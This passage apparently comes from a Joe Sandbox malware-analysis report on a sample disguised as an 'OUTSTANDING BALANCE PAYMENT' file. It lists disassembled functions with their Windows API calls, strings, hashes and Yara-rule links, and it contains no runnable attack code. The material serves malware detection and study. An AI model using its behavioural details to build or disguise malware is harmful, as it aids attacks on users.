                                                                  • Instruction Fuzzy Hash: 9DD1E37162021ADBCB149F69D885F6EB7B5FF04708F14865EF4059B181DBB0EC60DBA2
                                                                  Function 002E716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 002E71FC
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002E7247
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                  • API String ID: 3974292440-4258414348
                                                                  • Opcode ID: 028a7950396cc449623d51768079ca88aa9b71687a6fc3314316ff19333e3644
                                                                  • Instruction ID: e24ddf9e60e226df3611a95053cc3d969dd8f866c7a005f32f3d7d3ece92d05f
                                                                  • Opcode Fuzzy Hash: 028a7950396cc449623d51768079ca88aa9b71687a6fc3314316ff19333e3644
                                                                  • Instruction Fuzzy Hash: AC918E342247419BCB05EF20C851A6EB7A5BF94300F544899F8966B3E3DB70ED6ADF81
                                                                  Function 002BCB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnumChildWindows.USER32(?,002BCF50), ref: 002BCE90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumWindows
                                                                  • String ID: 4+3$CLASS$CLASSNN$H+3$INSTANCE$L+3$NAME$P+3$REGEXPCLASS$T+3$TEXT
                                                                  • API String ID: 3555792229-1830249822
                                                                  • Opcode ID: 4c73a5e7a5665845b320d76ec29e33908793cdbeb8b231ef17c17d2b72acb793
                                                                  • Instruction ID: 1a91e0aa6f37d95b0832643d79324ef49a13803c1cb956f02c4ae43068275b76
                                                                  • Opcode Fuzzy Hash: 4c73a5e7a5665845b320d76ec29e33908793cdbeb8b231ef17c17d2b72acb793
                                                                  • Instruction Fuzzy Hash: 71918234620507DBCB18EF60C482BEAFB75BF04390F64851AD959A7291DF70A979CBE0
                                                                  Function 002EE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002EE5AB
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002EBEAF), ref: 002EE607
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002EE647
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002EE68C
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002EE6C3
                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,002EBEAF), ref: 002EE6CF
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002EE6DF
                                                                  • DestroyIcon.USER32(?,?,?,?,?,002EBEAF), ref: 002EE6EE
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002EE70B
                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002EE717
                                                                    • Part of subcall function 002A0FA7: __wcsicmp_l.LIBCMT ref: 002A1030
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                  • String ID: .dll$.exe$.icl
                                                                  • API String ID: 1212759294-1154884017
                                                                  • Opcode ID: 1b3342f203f780d58e3745b60a91c3b4f1adb0e4393623ef9cbb2215bf4556bc
                                                                  • Instruction ID: 343bd1bed44781baae9c2e236539a0d0cc923b18fdffe02b8c4c603778b01ba9
                                                                  • Opcode Fuzzy Hash: 1b3342f203f780d58e3745b60a91c3b4f1adb0e4393623ef9cbb2215bf4556bc
                                                                  • Instruction Fuzzy Hash: 7361DF715A0255BBEF24DF65CC86FBE77ACAB18724F504106F911E60D1EBB0A9A0CB60
                                                                  Function 002CD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • CharLowerBuffW.USER32(?,?), ref: 002CD292
                                                                  • GetDriveTypeW.KERNEL32 ref: 002CD2DF
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002CD327
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002CD35E
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002CD38C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 1148790751-4113822522
                                                                  • Opcode ID: 0521414d2715f6fd6244fe3f958259406ecc43f0e7c9bd5334b66f5c6977a750
                                                                  • Instruction ID: c4e3d9ed94734ae26e147b603150f49fad2fbf8cbe608a540f84bb70036d8b41
                                                                  • Opcode Fuzzy Hash: 0521414d2715f6fd6244fe3f958259406ecc43f0e7c9bd5334b66f5c6977a750
                                                                  • Instruction Fuzzy Hash: 02513A75114205AFC701EF20C89196AB7E8FF98718F10896DF88A67291DB31EE19CF52
                                                                  Function 002C26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,002F3973,00000016,0000138C,00000016,?,00000016,0031DDB4,00000000,?), ref: 002C26F1
                                                                  • LoadStringW.USER32(00000000,?,002F3973,00000016), ref: 002C26FA
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,002F3973,00000016,0000138C,00000016,?,00000016,0031DDB4,00000000,?,00000016), ref: 002C271C
                                                                  • LoadStringW.USER32(00000000,?,002F3973,00000016), ref: 002C271F
                                                                  • __swprintf.LIBCMT ref: 002C276F
                                                                  • __swprintf.LIBCMT ref: 002C2780
                                                                  • _wprintf.LIBCMT ref: 002C2829
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002C2840
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 618562835-2268648507
                                                                  • Opcode ID: 92f7d6c5951d9867fe76b07cb3d9bffceee297a65c71d7b0d00b897e8af5f398
                                                                  • Instruction ID: 69795ea083b06848a50de8bcb3e7e82c9e3107e579e0c55d5cdc5ce83d7af309
                                                                  • Opcode Fuzzy Hash: 92f7d6c5951d9867fe76b07cb3d9bffceee297a65c71d7b0d00b897e8af5f398
                                                                  • Instruction Fuzzy Hash: A6415B76811219AACB15FBE0CE86EEEB778AF15344F100169B505B60D2EF346F29CF60
                                                                  Function 002CD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002CD0D8
                                                                  • __swprintf.LIBCMT ref: 002CD0FA
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 002CD137
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002CD15C
                                                                  • _memset.LIBCMT ref: 002CD17B
                                                                  • _wcsncpy.LIBCMT ref: 002CD1B7
                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002CD1EC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002CD1F7
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 002CD200
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002CD20A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 2733774712-3457252023
                                                                  • Opcode ID: 1bbec1fd592f89249e6d652586919239c10d5a8143a6f15f6d45268f5ab9f6bc
                                                                  • Instruction ID: 175163012735ae937ae50973bac4277238850b6da3c9b59d047abae420b5b004
                                                                  • Opcode Fuzzy Hash: 1bbec1fd592f89249e6d652586919239c10d5a8143a6f15f6d45268f5ab9f6bc
                                                                  • Instruction Fuzzy Hash: F231B2B651010AABDB21DFA4DC49FEB77BCEF89700F1041BAF909D2161EB7096548B25
                                                                  Function 002EE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002EBEF4,?,?), ref: 002EE754
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE76B
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE776
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE783
                                                                  • GlobalLock.KERNEL32(00000000), ref: 002EE78C
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE79B
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 002EE7A4
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE7AB
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE7BC
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0030D9BC,?), ref: 002EE7D5
                                                                  • GlobalFree.KERNEL32(00000000), ref: 002EE7E5
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 002EE809
                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002EE834
                                                                  • DeleteObject.GDI32(00000000), ref: 002EE85C
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002EE872
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3840717409-0
                                                                  • Opcode ID: 214716d702baea57fdb36a33aab7f59abc310986df3e9d507b7929003c017ba5
                                                                  • Instruction ID: 51f933d8438b5e5fbaeb270a3a8d8ba76b4685bd737cd6bc50a2186444d2c1b9
                                                                  • Opcode Fuzzy Hash: 214716d702baea57fdb36a33aab7f59abc310986df3e9d507b7929003c017ba5
                                                                  • Instruction Fuzzy Hash: 25414975601205EFDB129FA6DC98EAABBFCEF89711F108459F90AD7260DB319D40CB20
                                                                  Function 002D05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 002D076F
                                                                  • _wcscat.LIBCMT ref: 002D0787
                                                                  • _wcscat.LIBCMT ref: 002D0799
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D07AE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D07C2
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 002D07DA
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 002D07F4
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D0806
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                  • String ID: *.*
                                                                  • API String ID: 34673085-438819550
                                                                  • Opcode ID: 33472c4f4e3c4aae0855a6e5baa307c6fe9c42887a2fba6d8f9a1030893a8c39
                                                                  • Instruction ID: 0e20806346fdca4b16fded7d7b365cd2813a170ba38684751dfeb760c249c9ab
                                                                  • Opcode Fuzzy Hash: 33472c4f4e3c4aae0855a6e5baa307c6fe9c42887a2fba6d8f9a1030893a8c39
                                                                  • Instruction Fuzzy Hash: 1E8171715243419FCB24EF64C885A6EB7E8AB88314F14882FF885D7361EA74DD648F92
                                                                  Function 002EEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002EEF3B
                                                                  • GetFocus.USER32 ref: 002EEF4B
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 002EEF56
                                                                  • _memset.LIBCMT ref: 002EF081
                                                                  • GetMenuItemInfoW.USER32 ref: 002EF0AC
                                                                  • GetMenuItemCount.USER32(00000000), ref: 002EF0CC
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 002EF0DF
                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 002EF113
                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 002EF15B
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002EF193
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002EF1C8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1296962147-4108050209
                                                                  • Opcode ID: f543b9393b322aa37f504c62f70a217f05fb05509424b7dfd7f268643e78f3a6
                                                                  • Instruction ID: 0701593b9fdda449fa4ab9d53f87ee1572b5a2817246cbf077fb5427cedb5428
                                                                  • Opcode Fuzzy Hash: f543b9393b322aa37f504c62f70a217f05fb05509424b7dfd7f268643e78f3a6
                                                                  • Instruction Fuzzy Hash: 0181D070268346EFDB11CF16C984A6BBBE8FB88314F41052EF9889B291D770D811CF52
                                                                  Function 002BA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002BABD7
                                                                    • Part of subcall function 002BABBB: GetLastError.KERNEL32(?,002BA69F,?,?,?), ref: 002BABE1
                                                                    • Part of subcall function 002BABBB: GetProcessHeap.KERNEL32(00000008,?,?,002BA69F,?,?,?), ref: 002BABF0
                                                                    • Part of subcall function 002BABBB: HeapAlloc.KERNEL32(00000000,?,002BA69F,?,?,?), ref: 002BABF7
                                                                    • Part of subcall function 002BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002BAC0E
                                                                    • Part of subcall function 002BAC56: GetProcessHeap.KERNEL32(00000008,002BA6B5,00000000,00000000,?,002BA6B5,?), ref: 002BAC62
                                                                    • Part of subcall function 002BAC56: HeapAlloc.KERNEL32(00000000,?,002BA6B5,?), ref: 002BAC69
                                                                    • Part of subcall function 002BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002BA6B5,?), ref: 002BAC7A
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002BA8CB
                                                                  • _memset.LIBCMT ref: 002BA8E0
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002BA8FF
                                                                  • GetLengthSid.ADVAPI32(?), ref: 002BA910
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 002BA94D
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002BA969
                                                                  • GetLengthSid.ADVAPI32(?), ref: 002BA986
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002BA995
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 002BA99C
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002BA9BD
                                                                  • CopySid.ADVAPI32(00000000), ref: 002BA9C4
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002BA9F5
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002BAA1B
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002BAA2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: f6efe1af325dd7f50e548a0f5206578b3defc5be0379d9949e8d8def37fdd85b
                                                                  • Instruction ID: 2359808fd2999cfe11cfe010b9242975ba0d82aa7f09e730a6f6e666d244e4ac
                                                                  • Opcode Fuzzy Hash: f6efe1af325dd7f50e548a0f5206578b3defc5be0379d9949e8d8def37fdd85b
                                                                  • Instruction Fuzzy Hash: 4E518DB191020AAFDF15CFA0DD95EEEBBB9FF04340F04812AF815A7290DB309A15CB61
                                                                  Function 002D9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 002D9E36
                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002D9E42
                                                                  • CreateCompatibleDC.GDI32(?), ref: 002D9E4E
                                                                  • SelectObject.GDI32(00000000,?), ref: 002D9E5B
                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002D9EAF
                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 002D9EEB
                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002D9F0F
                                                                  • SelectObject.GDI32(00000006,?), ref: 002D9F17
                                                                  • DeleteObject.GDI32(?), ref: 002D9F20
                                                                  • DeleteDC.GDI32(00000006), ref: 002D9F27
                                                                  • ReleaseDC.USER32(00000000,?), ref: 002D9F32
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                  • String ID: (
                                                                  • API String ID: 2598888154-3887548279
                                                                  • Opcode ID: bcaeb7791c689a7e04b5e3bf8e1ff128bba01200986b0cbf21384ec2b2b9d913
                                                                  • Instruction ID: cc10900de13a14fbcf8fbdd2c4eb495081f33365740426c2cb06198ed8f8c914
                                                                  • Opcode Fuzzy Hash: bcaeb7791c689a7e04b5e3bf8e1ff128bba01200986b0cbf21384ec2b2b9d913
                                                                  • Instruction Fuzzy Hash: 27513875900309AFCB15CFA8D885EAEBBB9EF48310F14851EF95AA7350D771AD41CB90
                                                                  Function 002CCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2889450990-2391861430
